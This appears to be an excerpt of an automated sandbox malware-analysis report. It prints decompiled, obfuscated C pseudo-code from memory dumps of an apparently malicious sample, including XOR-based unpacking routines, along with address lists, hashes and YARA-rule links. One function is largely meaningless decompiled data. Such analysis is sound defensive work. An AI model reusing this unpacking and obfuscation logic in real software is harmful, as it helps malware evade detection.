0x2a823c2b) + 0x13852796)) != ( *(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852792) ^  *(_t471 + ( *_v20 ^ 0x2a823c2b) + 0x13852792) |  *(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852792)) ||  *((intOrPtr*)(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852796)) != ( *(_t471 + ( *_v40 ^ 0x2a823c2b) + 0x13852792) ^  *(_t471 + ( *_v32 ^ 0x2a823c2b) + 0x13852792) |  *(_t471 + ( *_v36 ^ 0x2a823c2b) + 0x13852792))) {
									L20:
									_v16 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
								} else {
									_push( &_v84);
									if(E0245AB1C() != _v76) {
										goto L20;
									}
								}
								_t251 = (_v28 ^ 0x2a823c2b) + _t470 + 0x138527e2 ^ 0x2a823c2b;
								continue;
							}
							break;
						}
						if(_v16 != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
							E0245A3D4( &_v108, _v24, 0x18);
							if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _v44) {
								E0245A9BA( &_v108, 0x18, (_v8 ^ 0x2a823c2b) + 0x138527e2);
							}
							_v40 = _v24 + 0x18;
							E0245A3D4(_v92 + _a4, _v40, _v88);
							if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _v44) {
								E0245A9BA(_v92 + _a4, _v88, 0);
							}
							 *_a12 =  *_a12 + _v88;
							_t269 = _v88;
							goto L30;
						} else {
							_t270 = (_v28 ^ 0x2a823c2b) + _a16 + 0x138527e2;
						}
					} else {
						E0245A3D4( &_v72, _v20, (_v44 ^ 0x2a823c2b) + 0x138527e2);
						_v44 = _v24;
						_v44 = _v44 - _a8;
						if(_v44 < _v20[4] + _v20[3]) {
							goto L7;
						} else {
							_t269 = _v20[3] + _v20[2] - _v44;
							L30:
							_t270 = _t269 + _a16;
						}
					}
					_a16 = _t270;
				}
				return _a4;
			}

0x0245ac66
0x0245ac72
0x0245ac95
0x0245acab
0x0245acb5
0x0245acc1
0x0245acd1
0x0245acd4
0x0245acee
0x0245acd6
0x0245acea
0x0245acea
0x0245acf1
0x0245acfb
0x0245ad05
0x0245ad12
0x0245ad14
0x0245ad17
0x0245ad1e
0x0245ad25
0x0245b0b5
0x0245ad38
0x0245ad41
0x0245ad52
0x0245ad55
0x0245ad67
0x0245ad71
0x0245adc1
0x0245adca
0x0245adcf
0x0245add4
0x0245add7
0x0245adde
0x0245ade5
0x0245adef
0x0245adf5
0x0245adfb
0x0245ae01
0x0245ae0b
0x0245b00a
0x0245ae18
0x0245ae27
0x0245ae2d
0x0245ae36
0x0245ae45
0x0245ae55
0x0245ae55
0x0245ae74
0x0245aff2
0x0245aff9
0x0245afe2
0x0245afe5
0x0245aff0
0x00000000
0x00000000
0x0245aff0
0x0245b008
0x00000000
0x0245b008
0x00000000
0x0245ae18
0x0245b028
0x0245b044
0x0245b055
0x0245b065
0x0245b065
0x0245b070
0x0245b080
0x0245b091
0x0245b09f
0x0245b09f
0x0245b0aa
0x0245b0ac
0x00000000
0x0245b02a
0x0245b032
0x0245b032
0x0245ad73
0x0245ad82
0x0245ad8a
0x0245ad95
0x0245ada9
0x00000000
0x0245adab
0x0245adba
0x0245b0af
0x0245b0af
0x0245b0af
0x0245ada9
0x0245b0b2
0x0245b0b2
0x0245b0e0

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c39beed9d773ac50f061575997088ebc726d784d305f87c0bd5237156629c58b
Instruction ID: f598e2546ef8a528e373b9f0d2d0c46e1e661f93a1333342073ab7094dc0eda9
Opcode Fuzzy Hash: c39beed9d773ac50f061575997088ebc726d784d305f87c0bd5237156629c58b
Instruction Fuzzy Hash: 89F1D775B001199FCF08DFA8D8A19EEB7F2FF5D304B69445AE886EB352D630A945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02442F44, Relevance: .3, Instructions: 311
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E02442F44(signed int __edx, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* __edi;
				signed int* _t89;
				signed int* _t91;
				signed int _t100;
				void* _t105;
				signed int _t111;
				intOrPtr _t118;
				signed int _t119;
				signed int _t123;
				signed char _t143;
				signed int* _t152;
				intOrPtr* _t154;
				signed int _t155;
				signed int _t156;
				signed int _t162;
				signed int _t167;
				signed int _t182;
				intOrPtr _t186;
				signed int _t189;
				signed int _t190;
				signed int _t196;
				signed int _t213;
				signed int _t215;
				signed int _t229;
				signed int _t230;
				intOrPtr _t239;

				_t218 = __edx;
				 *0x2449795 =  *0x2449795 & 0x02449815;
				_v44 = 0xc6f8e434;
				 *0x244980d = 0x2820;
				_v60 = 0xc6f8e409;
				 *0x244980d = 0x37e9;
				_v20 = 0xc6f8e435;
				_t239 =  *0x24492b0; // 0x1
				 *0x2449801 = 0x37a0;
				if(_t239 != 0) {
					return 0;
				} else {
					_v40 = 0xc6f8e635;
					asm("sbb [0x24497c9], edi");
					 *0x24497fd = 0x2449795 +  *0x24497fd;
					asm("adc ebx, 0x4a6a");
					 *0x2449789 =  *0x2449789 - 0 +  *0x2449791;
					 *0x2449791 =  *0x2449791 - ( *0x2449805 & 0x000000ff);
					_v60 = (_v40 ^ 0x2a823c2b) + 0x138527e2;
					_t162 =  *0x24497f9; // 0x8b744035
					 *0x24497d1 =  *0x24497d1 ^ _t162;
					asm("adc [0x244983d], ecx");
					_v60 = (_v20 ^ 0x2a823c2b) + 0x138527e2;
					 *0x2449741 =  *0x2449741 | 0x00005d67;
					 *0x244980d =  *0x244980d + ( *0x244974d & 0x000000ff);
					_v60 = (_v20 ^ 0x2a823c2b) + 0x138527e2;
					 *0x244984d = 0x528e;
					 *0x244973d = 0x6e19;
					if(_a8 == 0xc6f8e403) {
						_t89 =  *0x2449020; // 0x244925c
						 *0x2449741 =  *0x2449741 - 0x2507;
						_v48 = _t89;
						 *0x244985d =  *0x244985d |  *0x2449779 & 0x000000ff;
						_t91 =  *0x2449224; // 0x2449210
						 *0x244984d =  *0x244984d & 0x02449805;
						_v52 = _t91;
						 *0x2449845 =  *0x2449845 + 0 +  *0x2449809;
						 *0x2449745 =  *0x2449745 + 1;
						 *0x244978d = 0x7631;
						 *0x24492a8 =  *_v48;
						 *0x2449861 =  *0x2449861 ^ 0x00000cd2;
						 *0x24497d1 =  *0x24497d1 & 0x000018f1;
						 *0x2449751 =  *0x2449751 + 0x2449845;
						__eflags =  *0x2449751;
						 *0x24492ac =  *_v52;
					} else {
						 *0x2449855 = 0xed4;
						if(_a8 == 0xc6f8e417) {
							 *0x24497c1 = 0x4395;
							_t213 =  *0x24491a0; // 0x2449028
							 *0x24497d5 = 0x6280;
							_v40 = 0xc6f8e475;
							 *0x2449781 = 0x2465;
							_v60 = _t213;
							__eflags =  *0x24492a8; // 0x417e13
							if(__eflags != 0) {
								__eflags =  *0x24492ac; // 0x41b5af
								if(__eflags != 0) {
									_push( &_v64);
									 *0x2449751 =  *0x2449751 - 0x7ddd;
									 *0x24497c1 =  *0x24497c1 | 0x02449845;
									 *0x24497cd =  *0x24497cd - 0x1d21;
									_push((_v40 ^ 0x2a823c2b) + 0x138527e2);
									_push( *0x24492a4);
									_t152 =  *0x24497b5; // 0x24497d5
									 *0x2449815 =  *0x2449815 ^  *_t152;
									_t154 =  *0x24491c0; // 0x2449428
									_push( *0x24492a0);
									 *0x2449795 =  *0x2449795 + 0x2449855;
									 *0x244977d =  *0x244977d ^ 0x00007814;
									 *0x2449789 =  *0x2449789 & 0x02449785;
									_t155 = E02442209(_t213, __edx, 0x138527e2,  *_t154, 0x2449116, 1, 4);
									 *0x24497bd =  *0x24497bd ^ 0x00006575;
									__eflags = _t155;
									if(_t155 != 0) {
										 *0x24497d1 = 0x217c;
										 *0x24492b4 = 0xc6f8e434;
									}
								}
							}
							 *0x24492b0 = 1;
							 *0x2449851 = 0x5327;
						} else {
							 *0x2449815 = 0x68d8;
							 *0x2449849 = 0x5515;
							if(_a8 == 0xc6f8e419) {
								_t156 =  *0x24492a8; // 0x417e13
								_t215 =  *0x24492ac; // 0x41b5af
								asm("sbb dword [0x244985d], 0x2449859");
								 *0x2449845 = 0x18c1;
								 *0x24492a0 = _t156;
								 *0x2449845 = 0xa74;
								 *0x24492a4 = _t215 - _t156 + 4;
							}
						}
					}
					_v40 = 0xc6f8e403;
					 *0x24497c1 = 0x5d86;
					_v56 = 0xc6f8e419;
					 *0x24497fd =  *0x24497fd ^  *0x244985d & 0x000000ff;
					_v60 = 0xc6f8e417;
					asm("adc [0x2449839], eax");
					_t100 =  *0x24492b4; // 0xc6f8e434
					 *0x2449855 = 0x5025;
					if((_t100 ^ 0x2a823c2b) + 0x138527e2 == 0) {
						L21:
						_t79 = (_a8 ^ 0x2a823c2b) + 0x138527e2; // 0xda7e0c16
						_t229 = (_v44 ^ 0x2a823c2b) + _t79;
						while(1) {
							_t230 = _t229 ^ 0x2a823c2b;
							_t167 = _t230 ^ 0x2a823c2b;
							_t87 = _t167 + 0x138527e2; // 0xee0333f8
							_t105 = _t87;
							if(_t105 >= 0x28) {
								break;
							}
							__eflags = _t230 - _v40;
							if(_t230 == _v40) {
								L25:
								__eflags = _t230 - _v40 + _t230;
								if(_t230 == _v40 + _t230) {
									0x2859ba1(0xc66c634c);
								}
								__eflags = _t230 + 0xec7ad81e ^ 0x2a823c2b;
								E02442F44(_t218, _t230 + 0xec7ad81e ^ 0x2a823c2b, _t230);
								L28:
								_t111 = _v44 ^ 0x2a823c2b;
								__eflags = _t111;
								_t86 = _t167 + 0x138527e2; // 0xda7e0c16
								_t229 = _t111 + _t86;
								continue;
							}
							__eflags = _t230 - _v56;
							if(_t230 == _v56) {
								goto L25;
							}
							__eflags = _t230 - _v60;
							if(_t230 != _v60) {
								goto L28;
							}
							goto L25;
						}
						return _t105;
					}
					asm("sbb edx, 0x6be3");
					_v24 = (_v20 ^ 0x2a823c2b) + 0x138527e2;
					_t118 =  *0x24492a4; // 0x37a0
					_t182 =  *0x2449795; // 0xff4dd7d5
					 *0x2449795 = _t182 &  *0x2449779;
					_v36 = _t118;
					_t119 =  *0x24492a0; // 0x417e13
					_v32 = 0xc6f8e52d;
					_v32 = 0xc6f8e409;
					_v28 = _t119;
					asm("adc edx, ebx");
					_v32 = 0xc6f8e435;
					_v12 = 0xc6f8e434;
					_v20 = 0xc6f8e40b;
					 *0x2449851 =  *0x2449851 - 0x3254;
					asm("sbb [0x2449851], edx");
					 *0x24497d1 =  *0x24497d1 ^ 0x0000334b;
					_t186 =  *0x2449781; // 0x284c
					 *0x244977d =  *0x244977d + _t186;
					_t218 = 0xec7ad81e - (_v12 ^ 0x2a823c2b) + _v36;
					 *0x244978d = 0x7dc0;
					_v16 = 0xec7ad81e;
					_v68 = 0xc6f8e408;
					if(_v20 == 0xc6f8e435) {
						goto L21;
					} else {
						goto L13;
					}
					do {
						L13:
						asm("adc dword [0x244977d], 0x4edd");
						_t189 = _v12 ^ 0x2a823c2b;
						 *0x244983d = 0x2c79;
						_t42 = _t189 + 0x270a4fc4; // 0xee0333f8
						_t190 = (_v12 ^ 0x2a823c2b) + _t42;
						_t123 = _v16;
						 *0x244985d =  *0x244985d - 0x2449785;
						_t218 = _t123 % _t190;
						asm("sbb eax, ecx");
						 *0x2449841 =  *0x2449841 | _t190;
						asm("sbb dword [0x2449809], 0x5631");
						 *0x2449815 = 0x3d6a;
						 *0x2449805 = 0x6570;
						if(_t123 % _t190 == (_v20 ^ 0x2a823c2b) - (_v12 ^ 0x2a823c2b)) {
							asm("sbb [0x2449751], edx");
							_t143 =  *(_v16 + _v28);
							_v5 = 0xee;
							if(_v24 == 0) {
								_v5 = (_v5 & 0x000000ff) + _v24;
								_t218 = _v5 & 0x000000ff;
								_v5 = ((_v32 ^ 0x2a823c2b) + 0x138527e2) * (_v5 & 0x000000ff);
								_v5 = (_t143 ^ 0x0000003f) + 0x2f + (_v5 & 0x000000ff);
								_t143 = _v5;
							}
							 *(_v16 + _v28) = _t143;
						}
						if((_v16 - 0x138527e2 ^ 0x2a823c2b) != _v32) {
							_t196 = 0xec7ad81e - (_v12 ^ 0x2a823c2b) + _v16;
							__eflags = _t196;
						} else {
							_v20 = (_v20 ^ 0x2a823c2b) - (_v12 ^ 0x2a823c2b) - 0x138527e2 ^ 0x2a823c2b;
							_t196 = 0xec7ad81e - (_v12 ^ 0x2a823c2b) + _v36;
						}
						_v16 = _t196;
					} while (_v20 != 0xc6f8e435);
					goto L21;
				}
			}

0x02442f44
0x02442f4a
0x02442f54
0x02442f5d
0x02442f67
0x02442f6e
0x02442f78
0x02442f7f
0x02442f85
0x02442f8f
0x0244350a
0x02442f95
0x02442f95
0x02442f9c
0x02442fa5
0x02442fbf
0x02442fd2
0x02442fe1
0x02442fe7
0x02442fed
0x02442ff3
0x02442ffd
0x02443003
0x02443006
0x0244301a
0x0244302e
0x02443031
0x0244303e
0x02443048
0x024431cd
0x024431d2
0x024431dc
0x024431e6
0x024431ec
0x024431f1
0x024431fb
0x02443206
0x0244320f
0x02443217
0x02443221
0x02443226
0x02443233
0x0244323f
0x0244323f
0x02443249
0x0244304e
0x0244304e
0x0244305f
0x024430ca
0x024430d4
0x024430da
0x024430e4
0x024430eb
0x024430f5
0x024430f8
0x024430fe
0x02443104
0x0244310a
0x02443113
0x02443114
0x02443121
0x0244312f
0x02443139
0x0244313f
0x02443145
0x0244314c
0x02443152
0x02443157
0x0244315d
0x02443169
0x0244317c
0x02443186
0x0244318b
0x02443198
0x0244319a
0x024431a0
0x024431aa
0x024431aa
0x0244319a
0x0244310a
0x024431b4
0x024431be
0x02443065
0x02443065
0x02443076
0x02443080
0x0244308c
0x02443091
0x02443099
0x024430a6
0x024430b0
0x024430b5
0x024430bf
0x024430bf
0x02443080
0x0244305f
0x0244324e
0x02443251
0x0244325b
0x02443269
0x0244326f
0x0244327b
0x02443281
0x0244328a
0x02443294
0x02443483
0x0244348d
0x0244348d
0x024434f1
0x024434f1
0x024434f5
0x024434f7
0x024434f7
0x02443500
0x00000000
0x00000000
0x0244349c
0x0244349e
0x024434ba
0x024434bf
0x024434c1
0x024434d1
0x024434d1
0x024434dd
0x024434e0
0x024434e5
0x024434e8
0x024434e8
0x024434ea
0x024434ea
0x00000000
0x024434ea
0x024434a7
0x024434a9
0x00000000
0x00000000
0x024434b2
0x024434b4
0x00000000
0x00000000
0x00000000
0x024434b4
0x00000000
0x02443508
0x0244329a
0x024432b3
0x024432b6
0x024432bb
0x024432c7
0x024432cd
0x024432d6
0x024432db
0x024432e2
0x024432e9
0x024432f1
0x024432f3
0x024432f6
0x024432fd
0x02443304
0x02443317
0x02443328
0x02443334
0x0244333a
0x02443340
0x02443343
0x0244334d
0x02443350
0x0244335c
0x00000000
0x00000000
0x00000000
0x00000000
0x02443362
0x02443362
0x0244336a
0x02443374
0x02443376
0x02443380
0x02443380
0x02443387
0x0244338c
0x02443396
0x02443398
0x0244339d
0x024433aa
0x024433b6
0x024433c2
0x024433cc
0x024433d2
0x024433e4
0x024433ec
0x024433f5
0x02443404
0x0244340a
0x02443419
0x02443422
0x02443425
0x02443425
0x0244342e
0x0244342e
0x0244343c
0x0244346f
0x0244346f
0x02443442
0x02443452
0x0244345e
0x0244345e
0x02443472
0x02443478
0x00000000
0x02443362

Memory Dump Source

Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf37d778815b5c5410c4bd345a806caccfb08bcbda23945f25581fc76cf6c419
Instruction ID: 126b2907720bd0977da35cbc0d227528f0065ad7c70b349519b97b2f1d8d5b9c
Opcode Fuzzy Hash: cf37d778815b5c5410c4bd345a806caccfb08bcbda23945f25581fc76cf6c419
Instruction Fuzzy Hash: 74E17878E94614DFDB08CFA8E8949AF7BF1FB48314B148CAED405AB280DB745525EF10

Uniqueness

Uniqueness Score: -1.00%

Function 0040168B, Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E0040168B(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr* _t104;
				signed char _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t127;
				signed char _t128;
				signed char _t132;
				signed char _t133;
				void* _t165;
				void* _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t187;
				intOrPtr* _t188;
				void* _t189;
				intOrPtr* _t191;
				signed char _t195;
				intOrPtr* _t205;
				signed char _t213;
				signed char _t217;
				intOrPtr* _t224;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr* _t233;
				void* _t236;
				intOrPtr* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t232 = __esi;
				_t168 = __ebx;
				_t205 = __edx + __ecx;
				 *__eax =  *__eax + __ebx;
				_t253 = _t252 + __ecx;
				 *_t205 =  *_t205 + __ebx;
				 *__esi =  *__esi + __ecx;
				_t95 = __eax + _t205;
				 *_t95 =  *_t95 + _t205;
				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
				asm("rol byte [ecx], cl");
				_t224 = __edi + __ecx + 1;
				_t242 = _t241 + _t205;
				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
				_pop(_t96);
				_t187 = __ecx + _t205 + __ebx;
				_t5 = __esi + 1;
				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
				asm("fild dword [ecx]");
				if( *_t5 >= 0) {
					asm("fiadd word [ecx]");
				}
				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
				asm("loopne 0x3");
				_push(_t242);
				_t169 = _t168 + _t253;
				 *_t169 =  *_t169 + _t96;
				_t243 = _t242 + _t253;
				 *_t205 =  *_t205 + _t224;
				_t233 = _t232 + _t253;
				 *_t224 =  *_t224 + _t96;
				 *0x1901ea01 =  *0x1901ea01 + _t187;
				_t254 = _t253 + _t243;
				 *_t169 =  *_t169 + _t169;
				_t225 = _t224 + _t243;
				 *_t225 =  *_t225 + _t187;
				_t98 = _t96 + _t243 + _t233;
				 *_t187 =  *_t187 + _t205;
				_t188 = _t187 + _t233;
				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
				asm("cmc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
				asm("clc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
				asm("stc");
				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
				asm("sti");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
				 *_t188 =  *_t188 + 1;
				asm("arpl [ecx], ax");
				 *_t188 =  *_t188 + 1;
				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
				_t170 = _t169 +  *_t233;
				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
				asm("daa");
				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
				_t189 = _t188 +  *_t100;
				_t102 = _t100 +  *_t100 + _t170;
				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
				asm("insb");
				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
				_t236 = _t233 + _t100 + _t171 + _t254;
				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
				_t104 = _t102 +  *_t191 + _t225;
				_t237 = _t236 + _t225;
				 *0xa3013803 = _t104;
				asm("movsd");
				_t246 = _t245 +  *_t104;
				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
				_push(_t225);
				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
				asm("rol byte [ebx], cl");
				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
				_push(0x6a03de01);
				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
				_t230 = _t229 + _t249;
				asm("repne add ecx, [ebp+0x1]");
				asm("repe add esi, [edi]");
				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
				asm("std");
				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
				_t111 = 0x3e +  *_t195 * 0x7e;
				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
				_t112 = _t111 + 0xc;
				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
				_t113 = _t112 + 1;
				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
				_t114 = _t113 + 0xf2;
				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
				_t127 = _t114 + 0x99a;
				_t128 = _t127 + 0xc1;
				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
				_t133 = _t132 + 0xca;
				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
				asm("sbb eax, [esi]");
				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
			}

0x0040168b
0x0040168b
0x0040168b
0x0040168d
0x0040168f
0x00401691
0x00401695
0x00401697
0x00401699
0x0040169d
0x004016a0
0x004016a2
0x004016a3
0x004016a5
0x004016aa
0x004016ab
0x004016ad
0x004016ad
0x004016b0
0x004016b2
0x004016b4
0x004016b4
0x004016b5
0x004016b8
0x004016ba
0x004016bb
0x004016bd
0x004016bf
0x004016c1
0x004016c3
0x004016c5
0x004016c9
0x004016cf
0x004016d1
0x004016d3
0x004016d5
0x004016d7
0x004016d9
0x004016db
0x004016dd
0x004016e1
0x004016e4
0x004016e5
0x004016e8
0x004016e9
0x004016ec
0x004016ed
0x004016f0
0x004016f1
0x004016f4
0x004016f6
0x004016f8
0x00401701
0x00401709
0x0040170b
0x00401712
0x00401713
0x0040171b
0x00401729
0x0040172f
0x00401731
0x00401736
0x00401739
0x0040173f
0x00401741
0x00401743
0x00401747
0x0040174f
0x00401754
0x0040175c
0x0040175d
0x0040175f
0x00401767
0x00401772
0x00401773
0x00401779
0x00401783
0x0040178b
0x004017a4
0x004017ad
0x004017b2
0x004017bb
0x004017bd
0x004017c1
0x004017c3
0x004017cc
0x004017d0
0x004017d3
0x004017d8
0x004017d9
0x004017dc
0x004017e1
0x004017e3
0x004017e9
0x004017eb
0x004017f1
0x004017f3
0x004017f9
0x004017fb
0x00401803
0x0040180b
0x00401813
0x0040181b
0x00401823
0x0040182b
0x00401833
0x0040183b
0x00401843
0x0040184b
0x00401853
0x0040185b
0x00401861
0x00401865
0x00401871
0x00401875
0x00401897
0x004018dd
0x004018df
0x004018e6
0x004018f4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 038b8b2086ffd4ebd3b80362caee626f5b3b7132b45edde1848e0dbd5fb9aea4
Instruction ID: 84227ed5195d8b676ea1bf1a709c55a9e423ef62d58408d25d6ee187098feb16
Opcode Fuzzy Hash: 038b8b2086ffd4ebd3b80362caee626f5b3b7132b45edde1848e0dbd5fb9aea4
Instruction Fuzzy Hash: B78192319893918BCB95DF38C8D56D6BBB1EE4322432E85DDC8940EA03E22F651BDF51

Uniqueness

Uniqueness Score: -1.00%

Function 0245890F, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6de227351c0e53021663ceb58515057b849770f81e67cd40c091ab9af20315
Instruction ID: 8673448d8bbdfa009ba710bba6443073889654fb50ddd1652dee078b87213a99
Opcode Fuzzy Hash: fe6de227351c0e53021663ceb58515057b849770f81e67cd40c091ab9af20315
Instruction Fuzzy Hash: D181F4742001199FCB48CF18C894EAA77A6FF8D318F598199F94A9B365DB30E891CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02441000, Relevance: .2, Instructions: 193
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E02441000(signed int __ebx, void* __edi, signed int _a4, char* _a8, signed int _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				signed int _v36;
				signed int _t80;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				signed int _t114;
				signed int _t116;
				signed int _t132;
				signed int _t148;
				void* _t159;

				asm("sbb [0x2449809], eax");
				asm("adc [0x2449805], eax");
				 *0x2449809 =  *0x2449809 | __ebx;
				 *0x2449791 =  *0x2449791 - 0x244974d;
				_v28 = (0x000020b6 ^  *(_a4 + 0x20)) + 0x00003f01 & 0x0000ffff;
				_v5 = 0xed;
				 *0x24497bd =  *0x24497bd + 0x684b;
				_v32 =  &_v5;
				 *0x2449739 =  *0x2449739 ^ 0x02449749;
				asm("adc dword [0x24497fd], 0x3d75");
				 *0x2449781 =  *0x2449781 | 0x0000181d;
				 *_v32 = (_v5 ^ 0x0000003f) + 0x2f;
				_v16 = 0xc6f8e435;
				_v24 = 0xc6f8e434;
				_t87 = _v16;
				 *0x2449855 =  *0x2449855 ^ 0x0000608a;
				_t80 = 0x2a823c2b;
				 *0x24497d5 =  *0x24497d5 & _t87;
				 *0x2449751 =  *0x2449751 + __edi;
				asm("adc dword [0x24497b9], 0x3fe9");
